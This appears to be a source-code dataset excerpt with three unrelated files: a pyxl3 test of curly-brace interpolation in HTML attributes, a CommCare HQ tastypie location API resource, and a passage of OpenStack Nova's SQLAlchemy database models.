gvanrossum/pyxl3
|
e6588c12caee49c43faf6aa260f04d7e971f6aa8
|
[
"Apache-2.0"
] | 150
|
2016-01-26T13:25:58.000Z
|
2022-03-11T14:31:45.000Z
|
tests/test_curlies_in_attrs_2.py
|
gvanrossum/pyxl3
|
e6588c12caee49c43faf6aa260f04d7e971f6aa8
|
[
"Apache-2.0"
] | 7
|
2016-02-07T20:08:55.000Z
|
2019-07-09T03:35:49.000Z
|
tests/test_curlies_in_attrs_2.py
|
gvanrossum/pyxl3
|
e6588c12caee49c43faf6aa260f04d7e971f6aa8
|
[
"Apache-2.0"
] | 19
|
2016-01-27T15:48:48.000Z
|
2020-11-06T07:31:12.000Z
|
# coding: pyxl
from pyxl import html
def test():
assert str(<frag><img src="barbaz{'foo'}" /></frag>) == """<img src="barbazfoo" />"""
| 23.333333
| 89
| 0.585714
|
25cd5c9842ae4d2f8f97a27c37a694f38e414141
| 1,253
|
py
|
Python
|
corehq/apps/locations/resources/v0_1.py
|
SEL-Columbia/commcare-hq
|
992ee34a679c37f063f86200e6df5a197d5e3ff6
|
[
"BSD-3-Clause"
] | 1
|
2015-02-10T23:26:39.000Z
|
2015-02-10T23:26:39.000Z
|
corehq/apps/locations/resources/v0_1.py
|
SEL-Columbia/commcare-hq
|
992ee34a679c37f063f86200e6df5a197d5e3ff6
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/locations/resources/v0_1.py
|
SEL-Columbia/commcare-hq
|
992ee34a679c37f063f86200e6df5a197d5e3ff6
|
[
"BSD-3-Clause"
] | null | null | null |
from tastypie import fields
from corehq.apps.locations.models import Location, root_locations
from corehq.apps.api.resources.v0_1 import CustomResourceMeta, LoginAndDomainAuthentication
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.api.resources import JsonResource
class LocationResource(JsonResource):
type = "location"
uuid = fields.CharField(attribute='_id', readonly=True, unique=True)
location_type = fields.CharField(attribute='location_type', readonly=True)
name = fields.CharField(attribute='name', readonly=True, unique=True)
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
location_id = kwargs['pk']
return get_object_or_not_exist(Location, location_id, domain)
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
parent_id = bundle.request.GET.get("parent_id", None)
if parent_id:
parent = get_object_or_not_exist(Location, parent_id, domain)
return parent.children
return root_locations(domain)
class Meta(CustomResourceMeta):
authentication = LoginAndDomainAuthentication()
object_class = Location
resource_name = 'location'
limit = 0
| 39.15625
| 91
| 0.72067
|
e50e631b9edefe95acc719ff360ba8bed4630a17
| 55,155
|
py
|
Python
|
nova/db/sqlalchemy/models.py
|
nelsnelson/nova
|
826fe1cc6af2df291d5aaafdc5d498d626475d19
|
[
"Apache-2.0"
] | null | null | null |
nova/db/sqlalchemy/models.py
|
nelsnelson/nova
|
826fe1cc6af2df291d5aaafdc5d498d626475d19
|
[
"Apache-2.0"
] | null | null | null |
nova/db/sqlalchemy/models.py
|
nelsnelson/nova
|
826fe1cc6af2df291d5aaafdc5d498d626475d19
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for nova data.
"""
from oslo_config import cfg
from oslo_db.sqlalchemy import models
from oslo_utils import timeutils
from sqlalchemy import (Column, Index, Integer, BigInteger, Enum, String,
schema, Unicode)
from sqlalchemy.dialects.mysql import MEDIUMTEXT
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import orm
from sqlalchemy import ForeignKey, DateTime, Boolean, Text, Float
from nova.db.sqlalchemy import types
CONF = cfg.CONF
BASE = declarative_base()
def MediumText():
return Text().with_variant(MEDIUMTEXT(), 'mysql')
class NovaBase(models.TimestampMixin,
models.ModelBase):
metadata = None
def __copy__(self):
"""Implement a safe copy.copy().
SQLAlchemy-mapped objects travel with an object
called an InstanceState, which is pegged to that object
specifically and tracks everything about that object. It's
critical within all attribute operations, including gets
and deferred loading. This object definitely cannot be
shared among two instances, and must be handled.
The copy routine here makes use of session.merge() which
already essentially implements a "copy" style of operation,
which produces a new instance with a new InstanceState and copies
all the data along mapped attributes without using any SQL.
The mode we are using here has the caveat that the given object
must be "clean", e.g. that it has no database-loaded state
that has been updated and not flushed. This is a good thing,
as creating a copy of an object including non-flushed, pending
database state is probably not a good idea; neither represents
what the actual row looks like, and only one should be flushed.
"""
session = orm.Session()
copy = session.merge(self, load=False)
session.expunge(copy)
return copy
def save(self, session=None):
from nova.db.sqlalchemy import api
if session is None:
session = api.get_session()
super(NovaBase, self).save(session=session)
class Service(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a running service on a host."""
__tablename__ = 'services'
__table_args__ = (
schema.UniqueConstraint("host", "topic", "deleted",
name="uniq_services0host0topic0deleted"),
schema.UniqueConstraint("host", "binary", "deleted",
name="uniq_services0host0binary0deleted")
)
id = Column(Integer, primary_key=True)
host = Column(String(255)) # , ForeignKey('hosts.id'))
binary = Column(String(255))
topic = Column(String(255))
report_count = Column(Integer, nullable=False, default=0)
disabled = Column(Boolean, default=False)
disabled_reason = Column(String(255))
last_seen_up = Column(DateTime, nullable=True)
forced_down = Column(Boolean, default=False)
version = Column(Integer, default=0)
instance = orm.relationship(
"Instance",
backref='services',
primaryjoin='and_(Service.host == Instance.host,'
'Service.binary == "nova-compute",'
'Instance.deleted == 0)',
foreign_keys=host,
)
class ComputeNode(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a running compute service on a host."""
__tablename__ = 'compute_nodes'
__table_args__ = (
schema.UniqueConstraint(
'host', 'hypervisor_hostname', 'deleted',
name="uniq_compute_nodes0host0hypervisor_hostname0deleted"),
)
id = Column(Integer, primary_key=True)
service_id = Column(Integer, nullable=True)
# FIXME(sbauza: Host field is nullable because some old Juno compute nodes
# can still report stats from an old ResourceTracker without setting this
# field.
# This field has to be set non-nullable in a later cycle (probably Lxxx)
# once we are sure that all compute nodes in production report it.
host = Column(String(255), nullable=True)
vcpus = Column(Integer, nullable=False)
memory_mb = Column(Integer, nullable=False)
local_gb = Column(Integer, nullable=False)
vcpus_used = Column(Integer, nullable=False)
memory_mb_used = Column(Integer, nullable=False)
local_gb_used = Column(Integer, nullable=False)
hypervisor_type = Column(MediumText(), nullable=False)
hypervisor_version = Column(Integer, nullable=False)
hypervisor_hostname = Column(String(255))
# Free Ram, amount of activity (resize, migration, boot, etc) and
# the number of running VM's are a good starting point for what's
# important when making scheduling decisions.
free_ram_mb = Column(Integer)
free_disk_gb = Column(Integer)
current_workload = Column(Integer)
running_vms = Column(Integer)
# Note(masumotok): Expected Strings example:
#
# '{"arch":"x86_64",
# "model":"Nehalem",
# "topology":{"sockets":1, "threads":2, "cores":3},
# "features":["tdtscp", "xtpr"]}'
#
# Points are "json translatable" and it must have all dictionary keys
# above, since it is copied from <cpu> tag of getCapabilities()
# (See libvirt.virtConnection).
cpu_info = Column(MediumText(), nullable=False)
disk_available_least = Column(Integer)
host_ip = Column(types.IPAddress())
supported_instances = Column(Text)
metrics = Column(Text)
# Note(yongli): json string PCI Stats
# '[{"vendor_id":"8086", "product_id":"1234", "count":3 }, ...]'
pci_stats = Column(Text)
# extra_resources is a json string containing arbitrary
# data about additional resources.
extra_resources = Column(Text)
# json-encode string containing compute node statistics
stats = Column(Text, default='{}')
# json-encoded dict that contains NUMA topology as generated by
# objects.NUMATopoloogy._to_json()
numa_topology = Column(Text)
# allocation ratios provided by the RT
ram_allocation_ratio = Column(Float, nullable=True)
cpu_allocation_ratio = Column(Float, nullable=True)
class Certificate(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a x509 certificate."""
__tablename__ = 'certificates'
__table_args__ = (
Index('certificates_project_id_deleted_idx', 'project_id', 'deleted'),
Index('certificates_user_id_deleted_idx', 'user_id', 'deleted')
)
id = Column(Integer, primary_key=True)
user_id = Column(String(255))
project_id = Column(String(255))
file_name = Column(String(255))
class Instance(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a guest VM."""
__tablename__ = 'instances'
__table_args__ = (
Index('uuid', 'uuid', unique=True),
Index('instances_project_id_deleted_idx',
'project_id', 'deleted'),
Index('instances_reservation_id_idx',
'reservation_id'),
Index('instances_terminated_at_launched_at_idx',
'terminated_at', 'launched_at'),
Index('instances_uuid_deleted_idx',
'uuid', 'deleted'),
Index('instances_task_state_updated_at_idx',
'task_state', 'updated_at'),
Index('instances_host_node_deleted_idx',
'host', 'node', 'deleted'),
Index('instances_host_deleted_cleaned_idx',
'host', 'deleted', 'cleaned'),
schema.UniqueConstraint('uuid', name='uniq_instances0uuid'),
)
injected_files = []
id = Column(Integer, primary_key=True, autoincrement=True)
@property
def name(self):
try:
base_name = CONF.instance_name_template % self.id
except TypeError:
# Support templates like "uuid-%(uuid)s", etc.
info = {}
# NOTE(russellb): Don't use self.iteritems() here, as it will
# result in infinite recursion on the name property.
for column in iter(orm.object_mapper(self).columns):
key = column.name
# prevent recursion if someone specifies %(name)s
# %(name)s will not be valid.
if key == 'name':
continue
info[key] = self[key]
try:
base_name = CONF.instance_name_template % info
except KeyError:
base_name = self.uuid
return base_name
@property
def _extra_keys(self):
return ['name']
user_id = Column(String(255))
project_id = Column(String(255))
image_ref = Column(String(255))
kernel_id = Column(String(255))
ramdisk_id = Column(String(255))
hostname = Column(String(255))
launch_index = Column(Integer)
key_name = Column(String(255))
key_data = Column(MediumText())
power_state = Column(Integer)
vm_state = Column(String(255))
task_state = Column(String(255))
memory_mb = Column(Integer)
vcpus = Column(Integer)
root_gb = Column(Integer)
ephemeral_gb = Column(Integer)
ephemeral_key_uuid = Column(String(36))
# This is not related to hostname, above. It refers
# to the nova node.
host = Column(String(255)) # , ForeignKey('hosts.id'))
# To identify the "ComputeNode" which the instance resides in.
# This equals to ComputeNode.hypervisor_hostname.
node = Column(String(255))
# *not* flavorid, this is the internal primary_key
instance_type_id = Column(Integer)
user_data = Column(MediumText())
reservation_id = Column(String(255))
# NOTE(sbiswas7): 'scheduled_at' is still in the database
# and can be removed in the future release.
launched_at = Column(DateTime)
terminated_at = Column(DateTime)
# This always refers to the availability_zone kwarg passed in /servers and
# provided as an API option, not at all related to the host AZ the instance
# belongs to.
availability_zone = Column(String(255))
# User editable field for display in user-facing UIs
display_name = Column(String(255))
display_description = Column(String(255))
# To remember on which host an instance booted.
# An instance may have moved to another host by live migration.
launched_on = Column(MediumText())
# NOTE(jdillaman): locked deprecated in favor of locked_by,
# to be removed in Icehouse
locked = Column(Boolean)
locked_by = Column(Enum('owner', 'admin'))
os_type = Column(String(255))
architecture = Column(String(255))
vm_mode = Column(String(255))
uuid = Column(String(36), nullable=False)
root_device_name = Column(String(255))
default_ephemeral_device = Column(String(255))
default_swap_device = Column(String(255))
config_drive = Column(String(255))
# User editable field meant to represent what ip should be used
# to connect to the instance
access_ip_v4 = Column(types.IPAddress())
access_ip_v6 = Column(types.IPAddress())
auto_disk_config = Column(Boolean())
progress = Column(Integer)
# EC2 instance_initiated_shutdown_terminate
# True: -> 'terminate'
# False: -> 'stop'
# Note(maoy): currently Nova will always stop instead of terminate
# no matter what the flag says. So we set the default to False.
shutdown_terminate = Column(Boolean(), default=False)
# EC2 disable_api_termination
disable_terminate = Column(Boolean(), default=False)
# OpenStack compute cell name. This will only be set at the top of
# the cells tree and it'll be a full cell name such as 'api!hop1!hop2'
cell_name = Column(String(255))
internal_id = Column(Integer)
# Records whether an instance has been deleted from disk
cleaned = Column(Integer, default=0)
class InstanceInfoCache(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a cache of information about an instance
"""
__tablename__ = 'instance_info_caches'
__table_args__ = (
schema.UniqueConstraint(
"instance_uuid",
name="uniq_instance_info_caches0instance_uuid"),)
id = Column(Integer, primary_key=True, autoincrement=True)
# text column used for storing a json object of network data for api
network_info = Column(MediumText())
instance_uuid = Column(String(36), ForeignKey('instances.uuid'),
nullable=False)
instance = orm.relationship(Instance,
backref=orm.backref('info_cache', uselist=False),
foreign_keys=instance_uuid,
primaryjoin=instance_uuid == Instance.uuid)
class InstanceExtra(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'instance_extra'
__table_args__ = (
Index('instance_extra_idx', 'instance_uuid'),)
id = Column(Integer, primary_key=True, autoincrement=True)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'),
nullable=False)
numa_topology = orm.deferred(Column(Text))
pci_requests = orm.deferred(Column(Text))
flavor = orm.deferred(Column(Text))
vcpu_model = orm.deferred(Column(Text))
migration_context = orm.deferred(Column(Text))
instance = orm.relationship(Instance,
backref=orm.backref('extra',
uselist=False),
foreign_keys=instance_uuid,
primaryjoin=instance_uuid == Instance.uuid)
class InstanceTypes(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents possible flavors for instances.
Note: instance_type and flavor are synonyms and the term instance_type is
deprecated and in the process of being removed.
"""
__tablename__ = "instance_types"
__table_args__ = (
schema.UniqueConstraint("flavorid", "deleted",
name="uniq_instance_types0flavorid0deleted"),
schema.UniqueConstraint("name", "deleted",
name="uniq_instance_types0name0deleted")
)
# Internal only primary key/id
id = Column(Integer, primary_key=True)
name = Column(String(255))
memory_mb = Column(Integer, nullable=False)
vcpus = Column(Integer, nullable=False)
root_gb = Column(Integer)
ephemeral_gb = Column(Integer)
# Public facing id will be renamed public_id
flavorid = Column(String(255))
swap = Column(Integer, nullable=False, default=0)
rxtx_factor = Column(Float, default=1)
vcpu_weight = Column(Integer)
disabled = Column(Boolean, default=False)
is_public = Column(Boolean, default=True)
class Quota(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a single quota override for a project.
If there is no row for a given project id and resource, then the
default for the quota class is used. If there is no row for a
given quota class and resource, then the default for the
deployment is used. If the row is present but the hard limit is
Null, then the resource is unlimited.
"""
__tablename__ = 'quotas'
__table_args__ = (
schema.UniqueConstraint("project_id", "resource", "deleted",
name="uniq_quotas0project_id0resource0deleted"
),
)
id = Column(Integer, primary_key=True)
project_id = Column(String(255))
resource = Column(String(255), nullable=False)
hard_limit = Column(Integer)
class ProjectUserQuota(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a single quota override for a user with in a project."""
__tablename__ = 'project_user_quotas'
uniq_name = "uniq_project_user_quotas0user_id0project_id0resource0deleted"
__table_args__ = (
schema.UniqueConstraint("user_id", "project_id", "resource", "deleted",
name=uniq_name),
Index('project_user_quotas_project_id_deleted_idx',
'project_id', 'deleted'),
Index('project_user_quotas_user_id_deleted_idx',
'user_id', 'deleted')
)
id = Column(Integer, primary_key=True, nullable=False)
project_id = Column(String(255), nullable=False)
user_id = Column(String(255), nullable=False)
resource = Column(String(255), nullable=False)
hard_limit = Column(Integer)
class QuotaClass(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a single quota override for a quota class.
If there is no row for a given quota class and resource, then the
default for the deployment is used. If the row is present but the
hard limit is Null, then the resource is unlimited.
"""
__tablename__ = 'quota_classes'
__table_args__ = (
Index('ix_quota_classes_class_name', 'class_name'),
)
id = Column(Integer, primary_key=True)
class_name = Column(String(255))
resource = Column(String(255))
hard_limit = Column(Integer)
class QuotaUsage(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents the current usage for a given resource."""
__tablename__ = 'quota_usages'
__table_args__ = (
Index('ix_quota_usages_project_id', 'project_id'),
Index('ix_quota_usages_user_id_deleted', 'user_id', 'deleted'),
)
id = Column(Integer, primary_key=True)
project_id = Column(String(255))
user_id = Column(String(255))
resource = Column(String(255), nullable=False)
in_use = Column(Integer, nullable=False)
reserved = Column(Integer, nullable=False)
@property
def total(self):
return self.in_use + self.reserved
until_refresh = Column(Integer)
class Reservation(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a resource reservation for quotas."""
__tablename__ = 'reservations'
__table_args__ = (
Index('ix_reservations_project_id', 'project_id'),
Index('reservations_uuid_idx', 'uuid'),
Index('reservations_deleted_expire_idx', 'deleted', 'expire'),
Index('ix_reservations_user_id_deleted', 'user_id', 'deleted'),
)
id = Column(Integer, primary_key=True, nullable=False)
uuid = Column(String(36), nullable=False)
usage_id = Column(Integer, ForeignKey('quota_usages.id'), nullable=False)
project_id = Column(String(255))
user_id = Column(String(255))
resource = Column(String(255))
delta = Column(Integer, nullable=False)
expire = Column(DateTime)
usage = orm.relationship(
"QuotaUsage",
foreign_keys=usage_id,
primaryjoin='and_(Reservation.usage_id == QuotaUsage.id,'
'QuotaUsage.deleted == 0)')
class Snapshot(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a block storage device that can be attached to a VM."""
__tablename__ = 'snapshots'
__table_args__ = ()
id = Column(String(36), primary_key=True, nullable=False)
deleted = Column(String(36), default="")
@property
def name(self):
return CONF.snapshot_name_template % self.id
@property
def volume_name(self):
return CONF.volume_name_template % self.volume_id
user_id = Column(String(255))
project_id = Column(String(255))
volume_id = Column(String(36), nullable=False)
status = Column(String(255))
progress = Column(String(255))
volume_size = Column(Integer)
scheduled_at = Column(DateTime)
display_name = Column(String(255))
display_description = Column(String(255))
class BlockDeviceMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents block device mapping that is defined by EC2."""
__tablename__ = "block_device_mapping"
__table_args__ = (
Index('snapshot_id', 'snapshot_id'),
Index('volume_id', 'volume_id'),
Index('block_device_mapping_instance_uuid_device_name_idx',
'instance_uuid', 'device_name'),
Index('block_device_mapping_instance_uuid_volume_id_idx',
'instance_uuid', 'volume_id'),
Index('block_device_mapping_instance_uuid_idx', 'instance_uuid'),
)
id = Column(Integer, primary_key=True, autoincrement=True)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
instance = orm.relationship(Instance,
backref=orm.backref('block_device_mapping'),
foreign_keys=instance_uuid,
primaryjoin='and_(BlockDeviceMapping.'
'instance_uuid=='
'Instance.uuid,'
'BlockDeviceMapping.deleted=='
'0)')
source_type = Column(String(255))
destination_type = Column(String(255))
guest_format = Column(String(255))
device_type = Column(String(255))
disk_bus = Column(String(255))
boot_index = Column(Integer)
device_name = Column(String(255))
# default=False for compatibility of the existing code.
# With EC2 API,
# default True for ami specified device.
# default False for created with other timing.
# TODO(sshturm) add default in db
delete_on_termination = Column(Boolean, default=False)
snapshot_id = Column(String(36))
volume_id = Column(String(36))
volume_size = Column(Integer)
image_id = Column(String(36))
# for no device to suppress devices.
no_device = Column(Boolean)
connection_info = Column(MediumText())
class SecurityGroupInstanceAssociation(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'security_group_instance_association'
__table_args__ = (
Index('security_group_instance_association_instance_uuid_idx',
'instance_uuid'),
)
id = Column(Integer, primary_key=True, nullable=False)
security_group_id = Column(Integer, ForeignKey('security_groups.id'))
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
class SecurityGroup(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a security group."""
__tablename__ = 'security_groups'
__table_args__ = (
schema.UniqueConstraint('project_id', 'name', 'deleted',
name='uniq_security_groups0project_id0'
'name0deleted'),
)
id = Column(Integer, primary_key=True)
name = Column(String(255))
description = Column(String(255))
user_id = Column(String(255))
project_id = Column(String(255))
instances = orm.relationship(Instance,
secondary="security_group_instance_association",
primaryjoin='and_('
'SecurityGroup.id == '
'SecurityGroupInstanceAssociation.security_group_id,'
'SecurityGroupInstanceAssociation.deleted == 0,'
'SecurityGroup.deleted == 0)',
secondaryjoin='and_('
'SecurityGroupInstanceAssociation.instance_uuid == Instance.uuid,'
# (anthony) the condition below shouldn't be necessary now that the
# association is being marked as deleted. However, removing this
# may cause existing deployments to choke, so I'm leaving it
'Instance.deleted == 0)',
backref='security_groups')
class SecurityGroupIngressRule(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a rule in a security group."""
__tablename__ = 'security_group_rules'
__table_args__ = ()
id = Column(Integer, primary_key=True)
parent_group_id = Column(Integer, ForeignKey('security_groups.id'))
parent_group = orm.relationship("SecurityGroup", backref="rules",
foreign_keys=parent_group_id,
primaryjoin='and_('
'SecurityGroupIngressRule.parent_group_id == SecurityGroup.id,'
'SecurityGroupIngressRule.deleted == 0)')
protocol = Column(String(255))
from_port = Column(Integer)
to_port = Column(Integer)
cidr = Column(types.CIDR())
# Note: This is not the parent SecurityGroup. It's SecurityGroup we're
# granting access for.
group_id = Column(Integer, ForeignKey('security_groups.id'))
grantee_group = orm.relationship("SecurityGroup",
foreign_keys=group_id,
primaryjoin='and_('
'SecurityGroupIngressRule.group_id == SecurityGroup.id,'
'SecurityGroupIngressRule.deleted == 0)')
class SecurityGroupIngressDefaultRule(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'security_group_default_rules'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False)
protocol = Column(String(5)) # "tcp", "udp" or "icmp"
from_port = Column(Integer)
to_port = Column(Integer)
cidr = Column(types.CIDR())
class ProviderFirewallRule(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a rule in a security group."""
__tablename__ = 'provider_fw_rules'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False)
protocol = Column(String(5)) # "tcp", "udp", or "icmp"
from_port = Column(Integer)
to_port = Column(Integer)
cidr = Column(types.CIDR())
class KeyPair(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a public key pair for ssh / WinRM."""
__tablename__ = 'key_pairs'
__table_args__ = (
schema.UniqueConstraint("user_id", "name", "deleted",
name="uniq_key_pairs0user_id0name0deleted"),
)
id = Column(Integer, primary_key=True, nullable=False)
name = Column(String(255), nullable=False)
user_id = Column(String(255))
fingerprint = Column(String(255))
public_key = Column(MediumText())
type = Column(Enum('ssh', 'x509', name='keypair_types'),
nullable=False, server_default='ssh')
class Migration(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a running host-to-host migration."""
__tablename__ = 'migrations'
__table_args__ = (
Index('migrations_instance_uuid_and_status_idx', 'deleted',
'instance_uuid', 'status'),
Index('migrations_by_host_nodes_and_status_idx', 'deleted',
'source_compute', 'dest_compute', 'source_node', 'dest_node',
'status'),
)
id = Column(Integer, primary_key=True, nullable=False)
# NOTE(tr3buchet): the ____compute variables are instance['host']
source_compute = Column(String(255))
dest_compute = Column(String(255))
# nodes are equivalent to a compute node's 'hypervisor_hostname'
source_node = Column(String(255))
dest_node = Column(String(255))
# NOTE(tr3buchet): dest_host, btw, is an ip address
dest_host = Column(String(255))
old_instance_type_id = Column(Integer())
new_instance_type_id = Column(Integer())
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
# TODO(_cerberus_): enum
status = Column(String(255))
migration_type = Column(Enum('migration', 'resize', 'live-migration',
'evacuation'),
nullable=True)
hidden = Column(Boolean, default=False)
instance = orm.relationship("Instance", foreign_keys=instance_uuid,
primaryjoin='and_(Migration.instance_uuid == '
'Instance.uuid, Instance.deleted == '
'0)')
class Network(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a network."""
__tablename__ = 'networks'
__table_args__ = (
schema.UniqueConstraint("vlan", "deleted",
name="uniq_networks0vlan0deleted"),
Index('networks_bridge_deleted_idx', 'bridge', 'deleted'),
Index('networks_host_idx', 'host'),
Index('networks_project_id_deleted_idx', 'project_id', 'deleted'),
Index('networks_uuid_project_id_deleted_idx', 'uuid',
'project_id', 'deleted'),
Index('networks_vlan_deleted_idx', 'vlan', 'deleted'),
Index('networks_cidr_v6_idx', 'cidr_v6')
)
id = Column(Integer, primary_key=True, nullable=False)
label = Column(String(255))
injected = Column(Boolean, default=False)
cidr = Column(types.CIDR())
cidr_v6 = Column(types.CIDR())
multi_host = Column(Boolean, default=False)
gateway_v6 = Column(types.IPAddress())
netmask_v6 = Column(types.IPAddress())
netmask = Column(types.IPAddress())
bridge = Column(String(255))
bridge_interface = Column(String(255))
gateway = Column(types.IPAddress())
broadcast = Column(types.IPAddress())
dns1 = Column(types.IPAddress())
dns2 = Column(types.IPAddress())
vlan = Column(Integer)
vpn_public_address = Column(types.IPAddress())
vpn_public_port = Column(Integer)
vpn_private_address = Column(types.IPAddress())
dhcp_start = Column(types.IPAddress())
rxtx_base = Column(Integer)
project_id = Column(String(255))
priority = Column(Integer)
host = Column(String(255)) # , ForeignKey('hosts.id'))
uuid = Column(String(36))
mtu = Column(Integer)
dhcp_server = Column(types.IPAddress())
enable_dhcp = Column(Boolean, default=True)
share_address = Column(Boolean, default=False)
class VirtualInterface(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a virtual interface on an instance."""
__tablename__ = 'virtual_interfaces'
__table_args__ = (
schema.UniqueConstraint("address", "deleted",
name="uniq_virtual_interfaces0address0deleted"),
Index('virtual_interfaces_network_id_idx', 'network_id'),
Index('virtual_interfaces_instance_uuid_fkey', 'instance_uuid'),
Index('virtual_interfaces_uuid_idx', 'uuid'),
)
id = Column(Integer, primary_key=True, nullable=False)
address = Column(String(255))
network_id = Column(Integer)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
uuid = Column(String(36))
# TODO(vish): can these both come from the same baseclass?
class FixedIp(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a fixed IP for an instance."""
__tablename__ = 'fixed_ips'
__table_args__ = (
schema.UniqueConstraint(
"address", "deleted", name="uniq_fixed_ips0address0deleted"),
Index('fixed_ips_virtual_interface_id_fkey', 'virtual_interface_id'),
Index('network_id', 'network_id'),
Index('address', 'address'),
Index('fixed_ips_instance_uuid_fkey', 'instance_uuid'),
Index('fixed_ips_host_idx', 'host'),
Index('fixed_ips_network_id_host_deleted_idx', 'network_id', 'host',
'deleted'),
Index('fixed_ips_address_reserved_network_id_deleted_idx',
'address', 'reserved', 'network_id', 'deleted'),
Index('fixed_ips_deleted_allocated_idx', 'address', 'deleted',
'allocated'),
Index('fixed_ips_deleted_allocated_updated_at_idx', 'deleted',
'allocated', 'updated_at')
)
id = Column(Integer, primary_key=True)
address = Column(types.IPAddress())
network_id = Column(Integer)
virtual_interface_id = Column(Integer)
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
# associated means that a fixed_ip has its instance_id column set
# allocated means that a fixed_ip has its virtual_interface_id column set
# TODO(sshturm) add default in db
allocated = Column(Boolean, default=False)
# leased means dhcp bridge has leased the ip
# TODO(sshturm) add default in db
leased = Column(Boolean, default=False)
# TODO(sshturm) add default in db
reserved = Column(Boolean, default=False)
host = Column(String(255))
network = orm.relationship(Network,
backref=orm.backref('fixed_ips'),
foreign_keys=network_id,
primaryjoin='and_('
'FixedIp.network_id == Network.id,'
'FixedIp.deleted == 0,'
'Network.deleted == 0)')
instance = orm.relationship(Instance,
foreign_keys=instance_uuid,
primaryjoin='and_('
'FixedIp.instance_uuid == Instance.uuid,'
'FixedIp.deleted == 0,'
'Instance.deleted == 0)')
virtual_interface = orm.relationship(VirtualInterface,
backref=orm.backref('fixed_ips'),
foreign_keys=virtual_interface_id,
primaryjoin='and_('
'FixedIp.virtual_interface_id == '
'VirtualInterface.id,'
'FixedIp.deleted == 0,'
'VirtualInterface.deleted == 0)')
class FloatingIp(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a floating IP that dynamically forwards to a fixed IP."""
__tablename__ = 'floating_ips'
__table_args__ = (
schema.UniqueConstraint("address", "deleted",
name="uniq_floating_ips0address0deleted"),
Index('fixed_ip_id', 'fixed_ip_id'),
Index('floating_ips_host_idx', 'host'),
Index('floating_ips_project_id_idx', 'project_id'),
Index('floating_ips_pool_deleted_fixed_ip_id_project_id_idx',
'pool', 'deleted', 'fixed_ip_id', 'project_id')
)
id = Column(Integer, primary_key=True)
address = Column(types.IPAddress())
fixed_ip_id = Column(Integer)
project_id = Column(String(255))
host = Column(String(255)) # , ForeignKey('hosts.id'))
auto_assigned = Column(Boolean, default=False)
# TODO(sshturm) add default in db
pool = Column(String(255))
interface = Column(String(255))
fixed_ip = orm.relationship(FixedIp,
backref=orm.backref('floating_ips'),
foreign_keys=fixed_ip_id,
primaryjoin='and_('
'FloatingIp.fixed_ip_id == FixedIp.id,'
'FloatingIp.deleted == 0,'
'FixedIp.deleted == 0)')
class DNSDomain(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a DNS domain with availability zone or project info."""
__tablename__ = 'dns_domains'
__table_args__ = (
Index('dns_domains_project_id_idx', 'project_id'),
Index('dns_domains_domain_deleted_idx', 'domain', 'deleted'),
)
deleted = Column(Boolean, default=False)
domain = Column(String(255), primary_key=True)
scope = Column(String(255))
availability_zone = Column(String(255))
project_id = Column(String(255))
class ConsolePool(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents pool of consoles on the same physical node."""
__tablename__ = 'console_pools'
__table_args__ = (
schema.UniqueConstraint(
"host", "console_type", "compute_host", "deleted",
name="uniq_console_pools0host0console_type0compute_host0deleted"),
)
id = Column(Integer, primary_key=True)
address = Column(types.IPAddress())
username = Column(String(255))
password = Column(String(255))
console_type = Column(String(255))
public_hostname = Column(String(255))
host = Column(String(255))
compute_host = Column(String(255))
class Console(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a console session for an instance."""
__tablename__ = 'consoles'
__table_args__ = (
Index('consoles_instance_uuid_idx', 'instance_uuid'),
)
id = Column(Integer, primary_key=True)
instance_name = Column(String(255))
instance_uuid = Column(String(36), ForeignKey('instances.uuid'))
password = Column(String(255))
port = Column(Integer)
pool_id = Column(Integer, ForeignKey('console_pools.id'))
